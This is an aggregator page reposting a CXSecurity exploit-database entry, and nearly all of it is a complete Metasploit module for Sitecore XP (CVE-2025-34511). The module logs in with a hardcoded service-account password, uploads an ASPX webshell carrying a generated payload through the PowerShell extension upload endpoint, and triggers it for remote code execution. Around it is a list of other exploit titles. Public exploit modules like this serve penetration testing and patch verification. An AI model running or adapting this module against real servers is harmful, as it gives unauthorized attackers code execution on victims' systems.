惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
Visual Studio Blog
The Last Watchdog
The Last Watchdog
Cisco Talos Blog
Cisco Talos Blog
A
Arctic Wolf
WordPress大学
WordPress大学
The Hacker News
The Hacker News
C
Cybersecurity and Infrastructure Security Agency CISA
H
Help Net Security
GbyAI
GbyAI
V
V2EX
Security Latest
Security Latest
Cyberwarzone
Cyberwarzone
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
P
Privacy International News Feed
I
InfoQ
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
T
Tor Project blog
P
Privacy & Cybersecurity Law Blog
C
Cisco Blogs
月光博客
月光博客
B
Blog
T
Threat Research - Cisco Blogs
I
Intezer
Recent Announcements
Recent Announcements
Latest news
Latest news
S
Schneier on Security
美团技术团队
量子位
H
Hacker News: Front Page
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Webroot Blog
Webroot Blog
N
News | PayPal Newsroom
Martin Fowler
Martin Fowler
博客园 - 三生石上(FineUI控件)
雷峰网
雷峰网
爱范儿
爱范儿
T
Tailwind CSS Blog
Apple Machine Learning Research
Apple Machine Learning Research
博客园 - 聂微东
Cloudbric
Cloudbric
MyScale Blog
MyScale Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Microsoft Security Blog
Microsoft Security Blog
人人都是产品经理
人人都是产品经理
S
Securelist
Hacker News: Ask HN
Hacker News: Ask HN
Y
Y Combinator Blog
Attack and Defense Labs
Attack and Defense Labs
TaoSecurity Blog
TaoSecurity Blog

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Sitecore XP Post-Authentication File Upload
2025-09-14 · via The Exploit Database - CXSecurity.com

Sitecore XP Post-Authentication File Upload

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::SitecoreXp include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Sitecore XP CVE-2025-34511 Post-Authentication File Upload', 'Description' => %q{ This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold. }, 'License' => MSF_LICENSE, 'Author' => [ 'Piotr Bazydlo', # Discovery 'msutovsky-r7' # Module Creator ], 'References' => [ [ 'CVE', '2025-34511' ], ['URL', 'https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform'], ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667'] ], 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Windows', { 'Arch' => [ARCH_X86, ARCH_X64] } ] ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DisclosureDate' => '2025-06-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/']), ]) end def check return Exploit::CheckCode::Unknown('Could not log in, application might not be Sitecore') unless login_identitysrv('ServicesAPI', 'b') @is_logged = true return Exploit::CheckCode::Safe('Could not get elevated cookies') unless get_identity_cookies @is_elevated = true sitecore_version = get_version res = send_request_cgi({ 'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'), 'method' => 'GET', 'vars_get' => { 'hdl' => '1245516121' } }) return Exploit::CheckCode::Safe('PowerShell extension not detected, might not be installed in target Sitecore instance') unless res&.code == 200 return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4')) Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable") end def upload_webshell @webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx" @item_uri = Rex::Text.rand_text_alpha(8) exe = generate_payload_exe asp = Msf::Util::EXE.to_exe_aspx(exe) data_post = Rex::MIME::Message.new data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri")) data_post.add_part('en', nil, nil, %(form-data; name="LanguageName")) data_post.add_part('0', nil, nil, %(form-data; name="Overwrite")) data_post.add_part('0', nil, nil, %(form-data; name="Unpack")) data_post.add_part('en', nil, nil, %(form-data; name="Versioned")) data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}")) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'), 'vars_get' => { 'hdl' => '1245516121' }, 'data' => data_post.to_s, 'ctype' => "multipart/form-data; boundary=#{data_post.bound}" }) return false unless res&.code == 200 true end def trigger_webshell send_request_cgi({ 'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell), 'method' => 'GET' }) end def exploit if !@is_logged && !login_identitysrv('ServicesAPI', 'b') fail_with(Failure::NoAccess, 'Failed to log in, check the credentials') end if !@is_elevated && !get_identity_cookies fail_with(Failure::Unknown, 'Failed to get elevated cookies') end fail_with(Failure::PayloadFailed, 'Failed to upload webshell') unless upload_webshell trigger_webshell end end



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}